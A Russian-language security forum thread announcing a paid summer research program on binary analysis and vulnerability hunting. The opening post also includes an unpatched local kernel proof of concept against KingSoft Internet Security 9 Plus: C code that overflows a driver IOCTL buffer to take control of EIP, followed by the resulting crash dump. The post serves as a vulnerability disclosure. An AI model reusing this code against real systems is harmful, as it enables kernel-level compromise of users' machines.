Всем тем, кому нечего делать летом, и кто хочет получить реальные знания/опыт в сфере ИБ посвящается... Что из себя предствляет СISS Hot Summer? Это проект, который продолжается 1 июля до сентября месяца. В период проведения проекта будут сформулированы задания для каждого участника. Так же, будут назначены кураторы для каждого участника, которые будет отвечать на вопросы участников по заданиям, помогать правильно выбрать алгоритмы решения и всячески способствовать результативной работе участника. Так же, во время СISS Hot Summer будут проходить online конференции и мастер-классы, основные цели которых повышение уровня, как теоретических, так и практических знаний участников. Многие студенты, которые будут проходить университетскую практику в CISSRT, тоже могут принять участие в СISS Hot Summer. Задания будут даваться участникам индивидуально, в процессе обсуждения их интересов. Участник сам будет выбирать, над каким именно заданием он хочет работать. Все разработки ведутся по OpenSource методике, авторство кода сохраняется. Участник выбирает лицензию самостоятельно, по его личным предпочтениям(GPLv3, BSD, Apache и т.д.). Аспекты данной программы – исследование и разработка: 1) Динамический анализ a. Pin plugins – трассировка, автоматизация детектора уязвимостей и т.д. b. BitBlaze – работа с Temu, написание плагинов, исследование тейнтирования. 2) Статический анализ - IDA plugins a.differs: turbodiff, patchdiff, DarunGrim – усовершенствование текущих OpenSource «дифферов» b. различные "визуализаторы" – прорисовка трасс от различных трассироdщиков(Pin, temu и т.д.), оптимальные пути от точек и т.д. c.связывание Vine’a с IDA – IDAOCaml 3) Исследование "решателей"Solvers - STP,Z3,SMT и т.д. 4) Исследование отладчиков: a.плагины к Windbg, b.плагины к gdb ( Mac OS X, iOS) c.плагины к Immunity Debugger 5) Поиск уязвимостей, исследование новых векторов атаки: a.ядро OS - от Windows до Cisco IOS b.пользовательские приложения По окончанию проекта, ВСЕ успешно выполненные задания будут вознаграждены денежными призами от 30000 до 100000 рублей. Все желающие поучаствовать или просто задать интересующий Вас вопрос, пишите на CISSHOTSUMMER@gmail.com или мне в PM! P.S. на закуску нульдей в китайском авере: Код (Text): /* # Exploit Title: KingSoft Internet Security 9 Plus 0day Local Kernel PoC # Date: 2011-07-12 # Author: Nikita Tarakanov (CISS Research Team) # Software Link: http://www.kingsoftresearch.com/downloads/kis/kis.rar # Version: up to date kavbase.sys version 2009.6.17.160 # Tested on: Win XP SP3 # CVE : CVE-NO-MATCH # Status : Unpatched */ #include <windows.h> #include <stdio.h> #include <stdlib.h> #define MALLOCSIZE 0x1000 #define VULNIOCTL 0x20EC int main(int argc, char **argv) { HANDLE hDevice; DWORD cb; DWORD *buff; char *buff_out; int len = 0; DWORD val = 0xDEADBEEF; WORD padd= 0x0001; int outlen = 0, inlen = 0; char deviceName[] = "\\\\.\\kavbase"; if ( (hDevice = CreateFileA(deviceName, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL) ) != INVALID_HANDLE_VALUE ) { printf("Device succesfully opened %s!\n", deviceName); } else { printf("Error: Error opening device \n"); return 0; } cb = 0; buff = (DWORD*)malloc(MALLOCSIZE); if(!buff){ printf("malloc failed"); return 0; } memset((char*)buff, 'A', MALLOCSIZE-1); buff[0x205] = 0xBBADC0DE;//EIP under our control buff_out = (char*)malloc(MALLOCSIZE); if(!buff_out){ printf("malloc failed"); return 0; } memset(buff_out, 'B', MALLOCSIZE-1); inlen = 0x818; outlen = 0x818; DeviceIoControl(hDevice, VULNIOCTL, (LPVOID)buff, inlen, (LPVOID)buff_out, outlen, &cb, NULL); printf("You wont see this!!!"); free(buff); free(buff_out); } и собственно дамп: Код (Text): *** Fatal System Error: 0x00000050 (0xBBADC0DE,0x00000008,0xBBADC0DE,0x00000002) BugCheck 50, {bbadc0de, 8, bbadc0de, 2} Probably caused by : hardware Followup: MachineOwner --------- *** Possible invalid call from 80605409 ( nt!ExMapHandleToPointer+0xb1 ) *** Expected target 8052946a ( nt!RtlWalkFrameChain+0x0 ) nt!RtlpBreakWithStatusInstruction: 80527c0c cc int 3 kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: bbadc0de, memory referenced. Arg2: 00000008, value 0 = read operation, 1 = write operation. Arg3: bbadc0de, If non-zero, the instruction address which referenced the bad memory address. Arg4: 00000002, (reserved) Debugging Details: ------------------ WRITE_ADDRESS: bbadc0de Paged session pool FAULTING_IP: +152952f00badfdc bbadc0de ?? ??? MM_INTERNAL_CODE: 2 DEFAULT_BUCKET_ID: INTEL_CPU_MICROCODE_ZERO BUGCHECK_STR: 0x50 PROCESS_NAME: KingSoft_IS9_poc.exe TRAP_FRAME: f4515ba0 -- (.trap 0xfffffffff4515ba0) ErrCode = 00000010 eax=c0000001 ebx=81d91900 ecx=00000000 edx=f4515b00 esi=81ad4268 edi=81ce89b0 eip=bbadc0de esp=f4515c14 ebp=41414141 iopl=0 nv up ei ng nz ac pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 bbadc0de ?? ??? Resetting default scope LAST_CONTROL_TRANSFER: from 8060540e to bbadc0de POSSIBLE_INVALID_CONTROL_TRANSFER: from 80605409 to 8052946a STACK_TEXT: WARNING: Frame IP not in any known module. Following frames may be wrong. f4515c10 8060540e 00000818 00000000 81d9d460 0xbbadc0de f4515c34 804ee129 81d9d3a8 81d91900 806d2070 nt!ExMapHandleToPointer+0xb6 f4515c44 80574e56 81d91970 81ce89b0 81d91900 nt!IopfCallDriver+0x31 f4515c58 80575d11 81d9d3a8 81d91900 81ce89b0 nt!IopSynchronousServiceTail+0x70 f4515d00 8056e57c 000007e8 00000000 00000000 nt!IopXxxControlFile+0x5e7 f4515d34 8053d6d8 000007e8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a f4515d34 7c90e514 000007e8 00000000 00000000 nt!KiFastCallEntry+0xf8 0012ff1c 004099c6 000007e8 000020ec 00344e90 ntdll!KiFastSystemCallRet 0012ff78 0040141e 00000001 00342f90 00342fb0 KingSoft_IS9_poc!main+0x156 0012ffc0 7c817077 bec19574 01cc4039 7ffd6000 KingSoft_IS9_poc!__tmainCRTStartup+0xfb 0012fff0 00000000 00401475 00000000 78746341 kernel32!BaseProcessStart+0x23
Видимо из-за своей излишней скромности, ТС не дал ссылку на компанию-организатора сего богоугодного мероприятия: http://cisscompany.com/
Будьте добры, зопейшите их на видио и выложьте в Сети. Не все смогут учавствовать, атак было бы интересно посмотреть, и вам допалнительный пеар.
Orange Со временем, будут выкладываться различные материалы(презентации, статьи, видео), также в скором будущем предстоят вебинары(или видео подкасты, как их ещё называют).
NTarakanov Насколько я понимаю вы так называемые "белые" хакеры. Чем занимаются черношляпнеги всякому известно - пишут троев и взламывают сети. А про белые шляпы мало известно в наших краях. Посоветуйте, пожалуйста, хорошие книги/ресурсы на русском/английском чтобы разобраться, кто такие белые хакеры и что-там к чему.
Husky_Head_2014 так называемые "белые" или whitehat хакеры занимаются тем же, что и черношляпнеги, только во благо. Ресурсы:блоги и презентации с различных конференций, книги сейчас,имхо, уже бесполезно читать - слишком быстро устаревает информация, которая в них.